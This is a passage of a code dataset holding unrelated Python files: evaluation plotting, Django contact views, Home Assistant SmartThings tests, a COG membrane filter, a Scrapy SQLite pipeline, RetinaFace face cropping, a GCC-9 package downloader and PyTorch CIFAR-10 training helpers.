outputs[i].append(model.predict(frame)[0][0].item())\n source.release()\n\n# Create a graph of the output sequence on the original test dataset\nxvals = range(len(outputs[0]))\nplt.figure()\nplt.plot(xvals, outputs[0], label='Original')\nplt.xlabel(\"Frame #\")\nplt.xticks(xvals)\nplt.ylabel(\"Control Output\")\nplt.ylim((-1,1))\nplt.legend()\nplt.savefig(\"figs/fig4a.pdf\")\n\n# Create a graph of the output sequence on the dark simulated test dataset\nplt.figure()\nplt.plot(xvals, outputs[1], label='Dark')\nplt.xlabel(\"Frame #\")\nplt.xticks(xvals)\nplt.ylabel(\"Control Output\")\nplt.ylim((-1,1))\nplt.legend()\nplt.savefig(\"figs/fig4b.pdf\")\n\n# Create a graph of the output sequence on the light simulated test dataset\nplt.figure()\nplt.plot(xvals, outputs[2], label='Light')\nplt.xlabel(\"Frame #\")\nplt.xticks(xvals)\nplt.ylabel(\"Control Output\")\nplt.ylim((-1,1))\nplt.legend()\nplt.savefig(\"figs/fig4c.pdf\")\n","sub_path":"eval_noge_models.py","file_name":"eval_noge_models.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"366913087","text":"from django.shortcuts import render, redirect\nfrom .models import Contacts\n\n\ndef index(request):\n contacts = Contacts.objects.all()\n search_input = request.GET.get('search_area')\n if search_input:\n contacts = Contacts.objects.filter(full_name__icontains=search_input)\n else:\n contacts = Contacts.objects.all()\n search_input = ' '\n\n return render(request, 'index.html', {'contacts': contacts, 'search_input': search_input})\n\n\ndef add_contact(request):\n if request.method == 'POST':\n new_contact = Contacts(\n full_name=request.POST['fullname'],\n relationship=request.POST['relationship'],\n email=request.POST['email'],\n phone_number=request.POST['phone_number'],\n address=request.POST['address']\n )\n new_contact.save()\n return redirect('/')\n\n return render(request, 'new.html')\n\n\ndef contact_details(request, pk):\n contact = Contacts.objects.get(id=pk)\n return render(request, 'contact-profile.html', {'contact': contact})\n\n\ndef edit_contact(request, pk):\n contact = Contacts.objects.get(id=pk)\n\n if request.method == \"POST\":\n contact.full_name = request.POST['fullname']\n contact.relationship = request.POST['relationship']\n contact.email = request.POST['email']\n contact.phone_number = request.POST['phone_number']\n contact.address = request.POST['address']\n contact.save()\n\n return redirect('/contact_details/'+str(contact.id))\n\n return render(request, 'edit.html', {'contact': contact})\n\n\ndef delete_contact(request, pk):\n contact = Contacts.objects.get(id=pk)\n\n if request.method == \"POST\":\n contact.delete()\n return redirect(index)\n\n return render(request, 'delete.html', {'contact': contact})\n","sub_path":"mycontacts_list/contacts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"465621230","text":"\"\"\"Tests for the SmartThings component init module.\"\"\"\nfrom unittest.mock import Mock, patch\nfrom uuid import uuid4\n\nfrom aiohttp import ClientConnectionError, ClientResponseError\nfrom pysmartthings import InstalledAppStatus\nimport pytest\n\nfrom homeassistant.components import smartthings\nfrom homeassistant.components.smartthings.const import (\n DATA_BROKERS, DOMAIN, EVENT_BUTTON, SIGNAL_SMARTTHINGS_UPDATE,\n SUPPORTED_PLATFORMS)\nfrom homeassistant.exceptions import ConfigEntryNotReady\nfrom homeassistant.helpers.dispatcher import async_dispatcher_connect\n\nfrom tests.common import mock_coro\n\n\nasync def test_unrecoverable_api_errors_create_new_flow(\n hass, config_entry, smartthings_mock):\n \"\"\"\n Test a new config flow is initiated when there are API errors.\n\n 401 (unauthorized): Occurs when the access token is no longer valid.\n 403 (forbidden/not found): Occurs when the app or installed app could\n not be retrieved/found (likely deleted?)\n \"\"\"\n api = smartthings_mock.return_value\n for error_status in (401, 403):\n setattr(hass.config_entries, '_entries', [config_entry])\n api.app.return_value = mock_coro(\n exception=ClientResponseError(None, None,\n status=error_status))\n\n # Assert setup returns false\n result = await smartthings.async_setup_entry(hass, config_entry)\n assert not result\n\n # Assert entry was removed and new flow created\n await hass.async_block_till_done()\n assert not hass.config_entries.async_entries(DOMAIN)\n flows = hass.config_entries.flow.async_progress()\n assert len(flows) == 1\n assert flows[0]['handler'] == 'smartthings'\n assert flows[0]['context'] == {'source': 'import'}\n hass.config_entries.flow.async_abort(flows[0]['flow_id'])\n\n\nasync def test_recoverable_api_errors_raise_not_ready(\n hass, config_entry, smartthings_mock):\n \"\"\"Test config entry not ready raised for recoverable API errors.\"\"\"\n setattr(hass.config_entries, '_entries', [config_entry])\n api = smartthings_mock.return_value\n api.app.return_value = mock_coro(\n exception=ClientResponseError(None, None, status=500))\n\n with pytest.raises(ConfigEntryNotReady):\n await smartthings.async_setup_entry(hass, config_entry)\n\n\nasync def test_connection_errors_raise_not_ready(\n hass, config_entry, smartthings_mock):\n \"\"\"Test config entry not ready raised for connection errors.\"\"\"\n setattr(hass.config_entries, '_entries', [config_entry])\n api = smartthings_mock.return_value\n api.app.return_value = mock_coro(\n exception=ClientConnectionError())\n\n with pytest.raises(ConfigEntryNotReady):\n await smartthings.async_setup_entry(hass, config_entry)\n\n\nasync def test_base_url_no_longer_https_does_not_load(\n hass, config_entry, app, smartthings_mock):\n \"\"\"Test base_url no longer valid creates a new flow.\"\"\"\n hass.config.api.base_url = 'http://0.0.0.0'\n setattr(hass.config_entries, '_entries', [config_entry])\n api = smartthings_mock.return_value\n api.app.return_value = mock_coro(return_value=app)\n\n # Assert setup returns false\n result = await smartthings.async_setup_entry(hass, config_entry)\n assert not result\n\n\nasync def test_unauthorized_installed_app_raises_not_ready(\n hass, config_entry, app, installed_app,\n smartthings_mock):\n \"\"\"Test config entry not ready raised when the app isn't authorized.\"\"\"\n setattr(hass.config_entries, '_entries', [config_entry])\n setattr(installed_app, '_installed_app_status',\n InstalledAppStatus.PENDING)\n\n api = smartthings_mock.return_value\n api.app.return_value = mock_coro(return_value=app)\n api.installed_app.return_value = mock_coro(return_value=installed_app)\n\n with pytest.raises(ConfigEntryNotReady):\n await smartthings.async_setup_entry(hass, config_entry)\n\n\nasync def test_config_entry_loads_platforms(\n hass, config_entry, app, installed_app,\n device, smartthings_mock):\n \"\"\"Test config entry loads properly and proxies to platforms.\"\"\"\n setattr(hass.config_entries, '_entries', [config_entry])\n\n api = smartthings_mock.return_value\n api.app.return_value = mock_coro(return_value=app)\n api.installed_app.return_value = mock_coro(return_value=installed_app)\n api.devices.return_value = mock_coro(return_value=[device])\n\n with patch.object(hass.config_entries, 'async_forward_entry_setup',\n return_value=mock_coro()) as forward_mock:\n assert await smartthings.async_setup_entry(hass, config_entry)\n # Assert platforms loaded\n await hass.async_block_till_done()\n assert forward_mock.call_count == len(SUPPORTED_PLATFORMS)\n\n\nasync def test_unload_entry(hass, config_entry):\n \"\"\"Test entries are unloaded correctly.\"\"\"\n broker = Mock()\n broker.event_handler_disconnect = Mock()\n hass.data[DOMAIN][DATA_BROKERS][config_entry.entry_id] = broker\n\n with patch.object(hass.config_entries, 'async_forward_entry_unload',\n return_value=mock_coro(\n return_value=True\n )) as forward_mock:\n assert await smartthings.async_unload_entry(hass, config_entry)\n assert broker.event_handler_disconnect.call_count == 1\n assert config_entry.entry_id not in hass.data[DOMAIN][DATA_BROKERS]\n # Assert platforms unloaded\n await hass.async_block_till_done()\n assert forward_mock.call_count == len(SUPPORTED_PLATFORMS)\n\n\nasync def test_event_handler_dispatches_updated_devices(\n hass, device_factory, event_request_factory):\n \"\"\"Test the event handler dispatches updated devices.\"\"\"\n devices = [\n device_factory('Bedroom 1 Switch', ['switch']),\n device_factory('Bathroom 1', ['switch']),\n device_factory('Sensor', ['motionSensor']),\n ]\n device_ids = [devices[0].device_id, devices[1].device_id,\n devices[2].device_id]\n request = event_request_factory(device_ids)\n called = False\n\n def signal(ids):\n nonlocal called\n called = True\n assert device_ids == ids\n async_dispatcher_connect(hass, SIGNAL_SMARTTHINGS_UPDATE, signal)\n broker = smartthings.DeviceBroker(\n hass, devices, request.installed_app_id)\n\n await broker.event_handler(request, None, None)\n await hass.async_block_till_done()\n\n assert called\n for device in devices:\n assert device.status.values['Updated'] == 'Value'\n\n\nasync def test_event_handler_ignores_other_installed_app(\n hass, device_factory, event_request_factory):\n \"\"\"Test the event handler dispatches updated devices.\"\"\"\n device = device_factory('Bedroom 1 Switch', ['switch'])\n request = event_request_factory([device.device_id])\n called = False\n\n def signal(ids):\n nonlocal called\n called = True\n async_dispatcher_connect(hass, SIGNAL_SMARTTHINGS_UPDATE, signal)\n broker = smartthings.DeviceBroker(hass, [device], str(uuid4()))\n\n await broker.event_handler(request, None, None)\n await hass.async_block_till_done()\n\n assert not called\n\n\nasync def test_event_handler_fires_button_events(\n hass, device_factory, event_factory, event_request_factory):\n \"\"\"Test the event handler fires button events.\"\"\"\n device = device_factory('Button 1', ['button'])\n event = event_factory(device.device_id, capability='button',\n attribute='button', value='pushed')\n request = event_request_factory(events=[event])\n called = False\n\n def handler(evt):\n nonlocal called\n called = True\n assert evt.data == {\n 'component_id': 'main',\n 'device_id': device.device_id,\n 'location_id': event.location_id,\n 'value': 'pushed',\n 'name': device.label\n }\n hass.bus.async_listen(EVENT_BUTTON, handler)\n broker = smartthings.DeviceBroker(\n hass, [device], request.installed_app_id)\n await broker.event_handler(request, None, None)\n await hass.async_block_till_done()\n\n assert called\n","sub_path":"tests/components/smartthings/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":8166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"514201125","text":"\"\"\"Script for choosing only membrane cogs\"\"\"\nimport seaborn as sns\nimport pandas as pd\nfrom collections import Counter\nimport matplotlib.pyplot as plt\n\ntmhmm_path = 'data/711Genomes.tmhmm.txt'\ncogdb_path = 'data/cog2003-2014.csv'\nthreshold = 0.99\nprofile_img_output = 'profile.svg'\nmembr_cogs_list_output = 'data/membrane.txt'\n\n\n# proteins with two or more predicted helices\nmembrane_prots = [\n t.split('|')[0] for t in list(map(lambda x: x.strip(), open(tmhmm_path)))\n if int(t.split('PredHel=')[1].split('\\t')[0]) > 1\n]\n\ndb = pd.read_csv(cogdb_path, header=None, skipinitialspace=True)\nmembr_prots_in_cog = Counter(db[db[0].isin(membrane_prots)][6])\nprots_in_cog = Counter(db[6])\n\nmembrane_part = {}\nfor key in membr_prots_in_cog:\n membrane_part[key] = membr_prots_in_cog[key]/prots_in_cog[key]\n\n# drawing distribution of membranous part in cogs\nplt.figure(figsize=(12, 9))\nplt.title('Membrane proteins parts in COGs. Distribution')\nplt.xlabel('membrane proteins part')\nsns.distplot(list(membrane_part.values()), kde=None, bins=100)\nplt.tight_layout()\nplt.savefig(profile_img_output)\n\n# writing COGs with MP >= threshold\nwith open(membr_cogs_list_output, 'w') as fout:\n for key in membrane_part:\n if membrane_part[key] >= threshold:\n fout.write(key+'\\n')\n","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"2720067","text":"# -*- coding: utf-8 -*-\nimport sqlite3\n\nclass NbapttPipeline(object):\n def open_spider(self, spider):\n self.conn = sqlite3.connect (\"nbaptt.db\") \n self.cur = self.conn.cursor()\n sql = '''Create table nba_ptt( \n title TEXT,\n author TEXT,\n date TEXT)'''\n self.cur.execute(sql)\n def close_spider(self, spider):\n self.conn.commit()\n self.conn.close()\n def process_item(self, item, spider):\n title = item['title']\n author = item['author']\n price = item['date']\n x = (title, author, price)\n sql = '''insert into nba_ptt values(?,?,?)''' \n self.conn.execute(sql,x)\n return item\n","sub_path":"exercise/crawler_python_dm1920/ch26/nbaptt/nbaptt/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"30710324","text":"from __future__ import print_function\r\nimport os\r\nimport argparse\r\nimport torch\r\nimport numpy as np\r\nfrom data import cfg_mnet, cfg_re50\r\nfrom layers.functions.prior_box import PriorBox\r\nfrom utils.nms.py_cpu_nms import py_cpu_nms\r\nimport cv2\r\nfrom models.retinaface import RetinaFace\r\nfrom utils.box_utils import decode, decode_landm\r\nimport time\r\nfrom tqdm import tqdm, trange\r\n\r\nparser = argparse.ArgumentParser(description='Retinaface')\r\n\r\nparser.add_argument('-m', '--trained_model', default='./weights/Resnet50_Final.pth',\r\n type=str, help='Trained state_dict file path to open')\r\nparser.add_argument('--network', default='resnet50', help='Backbone network mobile0.25 or resnet50')\r\nparser.add_argument('--cpu', action=\"store_true\", default=False, help='Use cpu inference')\r\nparser.add_argument('--confidence_threshold', default=0.02, type=float, help='confidence_threshold')\r\nparser.add_argument('--top_k', default=5000, type=int, help='top_k')\r\nparser.add_argument('--nms_threshold', default=0.4, type=float, help='nms_threshold')\r\nparser.add_argument('--keep_top_k', default=750, type=int, help='keep_top_k')\r\nparser.add_argument('-s', '--save_image', action=\"store_true\", default=True, help='show detection results')\r\nparser.add_argument('--vis_thres', default=0.6, type=float, help='visualization_threshold')\r\nargs = parser.parse_args()\r\n\r\n# python -B crop_dataset.py --trained_model ./weights/mobilenet0.25_Final.pth --network mobile0.25 --cpu\r\n\r\n\r\ndef check_keys(model, pretrained_state_dict):\r\n ckpt_keys = set(pretrained_state_dict.keys())\r\n model_keys = set(model.state_dict().keys())\r\n used_pretrained_keys = model_keys & ckpt_keys\r\n unused_pretrained_keys = ckpt_keys - model_keys\r\n missing_keys = model_keys - ckpt_keys\r\n print('Missing keys:{}'.format(len(missing_keys)))\r\n print('Unused checkpoint keys:{}'.format(len(unused_pretrained_keys)))\r\n print('Used keys:{}'.format(len(used_pretrained_keys)))\r\n assert len(used_pretrained_keys) > 0, 'load NONE from pretrained checkpoint'\r\n return True\r\n\r\n\r\ndef remove_prefix(state_dict, prefix):\r\n ''' Old style model is stored with all names of parameters sharing common prefix 'module.' '''\r\n print('remove prefix \\'{}\\''.format(prefix))\r\n f = lambda x: x.split(prefix, 1)[-1] if x.startswith(prefix) else x\r\n return {f(key): value for key, value in state_dict.items()}\r\n\r\n\r\ndef load_model(model, pretrained_path, load_to_cpu):\r\n print('Loading pretrained model from {}'.format(pretrained_path))\r\n if load_to_cpu:\r\n pretrained_dict = torch.load(pretrained_path, map_location=lambda storage, loc: storage)\r\n else:\r\n device = torch.cuda.current_device()\r\n pretrained_dict = torch.load(pretrained_path, map_location=lambda storage, loc: storage.cuda(device))\r\n if \"state_dict\" in pretrained_dict.keys():\r\n pretrained_dict = remove_prefix(pretrained_dict['state_dict'], 'module.')\r\n else:\r\n pretrained_dict = remove_prefix(pretrained_dict, 'module.')\r\n check_keys(model, pretrained_dict)\r\n model.load_state_dict(pretrained_dict, strict=False)\r\n return model\r\n\r\nraw_dir = os.path.join(\"data\", \"eval\")\r\ncrop_dir = os.path.join(\"data\", \"eval_crop\")\r\n\r\nif __name__ == '__main__':\r\n torch.set_grad_enabled(False)\r\n cfg = None\r\n if args.network == \"mobile0.25\":\r\n cfg = cfg_mnet\r\n elif args.network == \"resnet50\":\r\n cfg = cfg_re50\r\n # net and model\r\n net = RetinaFace(cfg=cfg, phase = 'test')\r\n net = load_model(net, args.trained_model, args.cpu)\r\n net.eval()\r\n print('Finished loading model!')\r\n print(net)\r\n device = torch.device(\"cpu\" if args.cpu else \"cuda\")\r\n net = net.to(device)\r\n\r\n resize = 1\r\n\r\n # testing begin\r\n for d in tqdm(os.listdir(raw_dir)):\r\n if not os.path.exists(os.path.join(crop_dir, d)):\r\n os.makedirs(os.path.join(crop_dir, d))\r\n for img in tqdm(os.listdir(os.path.join(raw_dir, d)), leave=False):\r\n image_path = os.path.join(raw_dir, d, img)\r\n crop_image_path = os.path.join(crop_dir, d, img)\r\n img_raw = cv2.imread(image_path, cv2.IMREAD_COLOR)\r\n img = np.float32(img_raw)\r\n im_height, im_width, _ = img.shape\r\n scale = torch.Tensor([img.shape[1], img.shape[0], img.shape[1], img.shape[0]])\r\n img -= (104, 117, 123)\r\n img = img.transpose(2, 0, 1)\r\n img = torch.from_numpy(img).unsqueeze(0)\r\n img = img.to(device)\r\n scale = scale.to(device)\r\n\r\n tic = time.time()\r\n loc, conf, landms = net(img) # forward pass\r\n # print('net forward time: {:.4f}'.format(time.time() - tic))\r\n priorbox = PriorBox(cfg, image_size=(im_height, im_width))\r\n priors = priorbox.forward()\r\n priors = priors.to(device)\r\n prior_data = priors.data\r\n boxes = decode(loc.data.squeeze(0), prior_data, cfg['variance'])\r\n boxes = boxes * scale / resize\r\n boxes = boxes.cpu().numpy()\r\n scores = conf.squeeze(0).data.cpu().numpy()[:, 1]\r\n landms = decode_landm(landms.data.squeeze(0), prior_data, cfg['variance'])\r\n scale1 = torch.Tensor([img.shape[3], img.shape[2], img.shape[3], img.shape[2],\r\n img.shape[3], img.shape[2], img.shape[3], img.shape[2],\r\n img.shape[3], img.shape[2]])\r\n scale1 = scale1.to(device)\r\n landms = landms * scale1 / resize\r\n landms = landms.cpu().numpy()\r\n\r\n # ignore low scores\r\n inds = np.where(scores > args.confidence_threshold)[0]\r\n boxes = boxes[inds]\r\n landms = landms[inds]\r\n scores = scores[inds]\r\n\r\n # keep top-K before NMS\r\n order = scores.argsort()[::-1][:args.top_k]\r\n boxes = boxes[order]\r\n landms = landms[order]\r\n scores = scores[order]\r\n\r\n # do NMS\r\n dets = np.hstack((boxes, scores[:, np.newaxis])).astype(np.float32, copy=False)\r\n keep = py_cpu_nms(dets, args.nms_threshold)\r\n # keep = nms(dets, args.nms_threshold,force_cpu=args.cpu)\r\n dets = dets[keep, :]\r\n landms = landms[keep]\r\n\r\n # keep top-K faster NMS\r\n dets = dets[:args.keep_top_k, :]\r\n landms = landms[:args.keep_top_k, :]\r\n\r\n dets = np.concatenate((dets, landms), axis=1)\r\n\r\n # show/save image\r\n for b in dets:\r\n if b[4] < args.vis_thres:\r\n continue\r\n text = \"{:.4f}\".format(b[4])\r\n b = list(map(int, b))\r\n x1, y1, x2, y2 = max(0, b[0]), max(0, b[1]), max(0, b[2]), max(0, b[3])\r\n w, h = x2 - x1, y2 - y1\r\n if w <= 10 or h <= 10:\r\n continue\r\n nw, nh = max(w, h), max(w, h)\r\n x1, y1 = max(0, x1-(nw-w)//2), max(0, y1-(nh-h)//2)\r\n crop_img = img_raw[y1:y1+nh, x1:x1+nw]\r\n crop_img = cv2.resize(crop_img, (112, 112), interpolation=cv2.INTER_AREA)\r\n cv2.imwrite(crop_image_path, crop_img)\r\n # cv2.imshow(\"Plotted\", crop_img)\r\n # cv2.waitKey(0)\r\n\r\n","sub_path":"face_detector/crop_dataset.py","file_name":"crop_dataset.py","file_ext":"py","file_size_in_byte":7335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"121739643","text":"import requests\r\nimport os\r\nimport hashlib\r\nimport re\r\nimport sys\r\nimport platform\r\nimport time\r\n\r\nurl ='http://ppa.launchpad.net/ubuntu-toolchain-r/test/ubuntu/pool/main/g/gcc-9/'\r\n\r\n\r\n#下载函数\r\ndef downloader(url,filepath):\r\n start=time.time()\r\n size=0\r\n file=requests.get(url,stream=True)\r\n count=1024\r\n content_size=int(file.headers['content-length'])\r\n print('[ 地址 ]:'+url)\r\n if file.status_code==200:\r\n if content_size<1024: #字节 byte\r\n print('[文件大小]:%0.2f byte'%(content_size))\r\n elif content_size<1024*1024: #Kb\r\n print('[文件大小]:%0.2f Kb'%(content_size/1024))\r\n count=2048\r\n else: #Mb\r\n print('[文件大小]:%0.2f Mb'%(content_size/1024/1024))\r\n count=2048\r\n with open(filepath,'wb+')as f:\r\n for data in file.iter_content(chunk_size=count):\r\n f.write(data)\r\n size+=len(data)\r\n print('\\r'+'[下载进度]:%s%0.2f%%'%('>'*int(size*50/content_size),float(size/content_size*100)),end='')\r\n end=time.time()\r\n print('[ 耗时 ]:%0.2f'%(end-start))\r\n\r\n\r\nif __name__=='__main__':\r\n #获取系统架构\r\n sysarch=platform.machine()\r\n sysarch=sysarch.lower()\r\n vermatch=r'href.*?cpp.*?\\-doc_.*?ubuntu1~([\\d|\\.]*?)\\_.*?.deb.*?'\r\n \r\n if url[len(url)-1]=='/':\r\n url=url[:-1]\r\n new_md5=hashlib.md5()\r\n new_md5.update(url.encode('utf8'))\r\n urlhash=str(new_md5.hexdigest()) #计算网址哈希值\r\n files=os.listdir('.') #获取此目录文件名\r\n print('[获取网页]')\r\n fae=False\r\n for i in range(0,len(files)):\r\n if files[i][:-4]==urlhash:\r\n fae=True\r\n break\r\n if fae:#创建文件\r\n print('[网页已缓存,读取]')\r\n f=open(files[i],\"r\")\r\n strhtml=f.read()\r\n f.close()\r\n else:\r\n strhtml =requests.get(url)\r\n strhtml=strhtml.text\r\n #将网页写入文件\r\n f=open(urlhash+'.txt','w+')\r\n f.write(strhtml)\r\n f.close()\r\n print('[读取网页成功]')\r\n #读取支持的版本\r\n uvs=re.findall(vermatch,strhtml)\r\n if uvs==None:\r\n print('!获取版本信息错误,请检查正则表达式vermatch或'+urlhash+'.txt文件内的网页缓存')\r\n sys.exit()\r\n print('*'*50)\r\n for ver in uvs:\r\n print(ver)\r\n print('*'*50)\r\n vercheck=input('*上面是支持的Ubuntu版本,请输入对应的版本号:')\r\n isinarray=False\r\n for ver in uvs:\r\n if ver==vercheck:\r\n isinarray=True\r\n break\r\n if not isinarray:\r\n print('!输入版本不支持')\r\n sys.exit()\r\n \r\n archmatch=r'href.*?gcc.*?base.*?ubuntu1~'+vercheck+r'\\_([\\S]*?)\\.deb'\r\n #读取支持的架构\r\n uas=re.findall(archmatch,strhtml)\r\n check=input('*本机系统架构为:'+sysarch+',手动选择?(n/y):')\r\n if check!='':\r\n if check[0]=='y' or check=='Y':\r\n for arch in uas:\r\n print(arch)\r\n archeck=input('*上面是PPA中Ubuntu-'+vercheck+'支持的架构,输入对应架构:')\r\n else:\r\n archeck=sysarch\r\n isinarry=False\r\n for arch in uas:\r\n if arch==archeck: \r\n isinarray=True\r\n break\r\n if not isinarray:\r\n print('架构不支持')\r\n sys.exit()\r\n\r\n filematch=r'href.*?\"(.*?ubuntu1~'+vercheck+r'_'+archeck+r'\\.deb)\"'\r\n fname=re.findall(filematch,strhtml)#匹配文件名\r\n print('[完成文件名查找,开始写入文件]') \r\n \r\n #将读取的文件名写入文件\r\n fnamelen=len(fname) #文件数量\r\n filename=urlhash+'_files.txt'\r\n f=open(filename,'w+')\r\n f.write('file num:'+str(fnamelen)+'\\n')\r\n for line in fname:\r\n f.write(line+'\\n')\r\n f.close()\r\n \r\n print('[文件名已写入文件]:'+filename)\r\n print('[共 '+str(fnamelen)+' 个文件]')\r\n \r\n #开始根据文件名下载文件\r\n check=input('*是否开始下载文件?(n/y):')\r\n if check!='':\r\n if check[0]!='y' and check[0]!='Y':\r\n sys.exit()\r\n else:\r\n sys.exit()\r\n #创建文件夹\r\n dire=re.search(r'[^/]*$',url) #根据网址的匹配出文件夹名\r\n if dire==None:\r\n print('!文件夹名出错')\r\n sys.exit()\r\n dire=str(dire.group())\r\n \r\n print('[下载目录]:'+dire)\r\n isexists=os.path.exists(dire)\r\n if not isexists:\r\n os.mkdir(dire)\r\n dire+='\\\\'\r\n url+='/'\r\n for i in range(0,fnamelen):\r\n print('[开始下载]:'+fname[i])\r\n downloader(url+fname[i],dire+fname[i])\r\n print('[下载完成]\\n[剩余]:%d/%d'% (fnamelen-i-1,fnamelen))\r\n\r\n\r\n\r\n","sub_path":"get-gcc-9.py","file_name":"get-gcc-9.py","file_ext":"py","file_size_in_byte":4746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"445788639","text":"'''Some helper functions for PyTorch, including:\n - get_mean_and_std: calculate the mean and std value of dataset.\n - msr_init: net parameter initialization.\n - progress_bar: progress bar mimic xlua.progress.\n'''\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport time\nimport math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.init as init\n\nimport torchvision\nimport torchvision.transforms as transforms\n\nfrom torch.autograd import Variable\n\nimport torch.optim as optim\n\ncriterion = nn.CrossEntropyLoss()\n\ndef get_mean_and_std(dataset):\n '''Compute the mean and std value of dataset.'''\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=1, shuffle=True, num_workers=2)\n mean = torch.zeros(3)\n std = torch.zeros(3)\n print('==> Computing mean and std..')\n for inputs, targets in dataloader:\n for i in range(3):\n mean[i] += inputs[:,i,:,:].mean()\n std[i] += inputs[:,i,:,:].std()\n mean.div_(len(dataset))\n std.div_(len(dataset))\n return mean, std\n\ndef init_params(net):\n '''Init layer parameters.'''\n for m in net.modules():\n if isinstance(m, nn.Conv2d):\n init.kaiming_normal(m.weight, mode='fan_out')\n if m.bias:\n init.constant(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.constant(m.weight, 1)\n init.constant(m.bias, 0)\n elif isinstance(m, nn.Linear):\n init.normal(m.weight, std=1e-3)\n if m.bias:\n init.constant(m.bias, 0)\n\n\n\ndef format_time(seconds):\n days = int(seconds / 3600/24)\n seconds = seconds - days*3600*24\n hours = int(seconds / 3600)\n seconds = seconds - hours*3600\n minutes = int(seconds / 60)\n seconds = seconds - minutes*60\n secondsf = int(seconds)\n seconds = seconds - secondsf\n millis = int(seconds*1000)\n\n f = ''\n i = 1\n if days > 0:\n f += str(days) + 'D'\n i += 1\n if hours > 0 and i <= 2:\n f += str(hours) + 'h'\n i += 1\n if minutes > 0 and i <= 2:\n f += str(minutes) + 'm'\n i += 1\n if secondsf > 0 and i <= 2:\n f += str(secondsf) + 's'\n i += 1\n if millis > 0 and i <= 2:\n f += str(millis) + 'ms'\n i += 1\n if f == '':\n f = '0ms'\n return f\n\ndef get_data():\n print('==> Preparing data..')\n transform_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ])\n\n trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=100, shuffle=True, num_workers=2)\n\n testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_test)\n testloader = torch.utils.data.DataLoader(testset, batch_size=100, shuffle=False, num_workers=2)\n\n return trainloader, testloader\n\ndef save_state(model_name, model_weights, acc):\n print('==> Saving model ...')\n state = {\n 'acc': acc,\n 'state_dict': model_weights.state_dict(),\n }\n for key in list(state['state_dict'].keys()):\n if 'module' in key:\n state['state_dict'][key.replace('module.', '')] = \\\n state['state_dict'].pop(key)\n\n torch.save(state, 'saved_models/ckpt'+model_name+'.t7')\n\ndef load_best(model_name, model_wts):\n filename = 'saved_models/ckpt' + model_name + '.t7'\n\n checkpoint = None\n\n if torch.cuda.is_available():\n checkpoint = torch.load(filename)\n else:\n checkpoint = torch.load(filename, map_location=lambda storage, loc: storage)\n\n\n best_acc = checkpoint['acc']\n print(\"Loading checkpoint with best_acc: \", best_acc)\n\n '''\n state_dict = checkpoint['model']\n\n # create new OrderedDict that does not contain `module.`\n from collections import OrderedDict\n new_state_dict = OrderedDict()\n for k, v in state_dict.items():\n name = k[7:] # remove `module.`\n new_state_dict[name] = v\n # load params\n model_wts.load_state_dict(new_state_dict)\n '''\n state_dict = checkpoint['state_dict']\n model_wts.load_state_dict(state_dict)\n\n return model_name, model_wts, best_acc\n\n\ndef finetune(model, model_name, best_acc, finetuning_epochs, train_loader, test_loader, lr):\n optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9, weight_decay=5e-4)\n for epoch in range(1, finetuning_epochs):\n train(model, epoch, optimizer, trainloader=train_loader)\n best_acc = test(model_name, model, epoch, test_loader, best_acc)\n return best_acc\n\n# Training\ndef train(model, epoch, optimizer, trainloader):\n #model_name, model = model[0], model[1]\n use_cuda = torch.cuda.is_available()\n\n if use_cuda:\n model.cuda()\n model = torch.nn.DataParallel(model, device_ids=range(torch.cuda.device_count()))\n\n print('\\nEpoch: %d' % epoch)\n\n model.train()\n\n train_loss = 0\n correct = 0\n total = 0\n\n for batch_idx, (inputs, targets) in enumerate(trainloader):\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n\n optimizer.zero_grad()\n\n inputs, targets = Variable(inputs), Variable(targets)\n outputs = model(inputs)\n\n loss = criterion(outputs, targets)\n loss.backward()\n\n optimizer.step()\n\n train_loss += loss.data[0]\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n\n acc = 100.*correct/total\n\n print(\" Accuracy: \", acc)\n\n\n\ndef test(model_name, model, epoch, testloader, best_acc):\n use_cuda = torch.cuda.is_available()\n\n if use_cuda:\n model.cuda()\n model = torch.nn.DataParallel(model, device_ids=range(torch.cuda.device_count()))\n\n model.eval()\n test_loss = 0\n correct = 0\n total = 0\n\n for batch_idx, (inputs, targets) in enumerate(testloader):\n if use_cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n inputs, targets = Variable(inputs, volatile=True), Variable(targets)\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n\n test_loss += loss.data[0]\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n\n # Save checkpoint.\n acc = 100.*correct/total\n\n if acc > best_acc:\n print('Saving..')\n save_state(model_name, model, acc)\n best_acc = acc\n return best_acc\n\n# deep compression\n\ndef 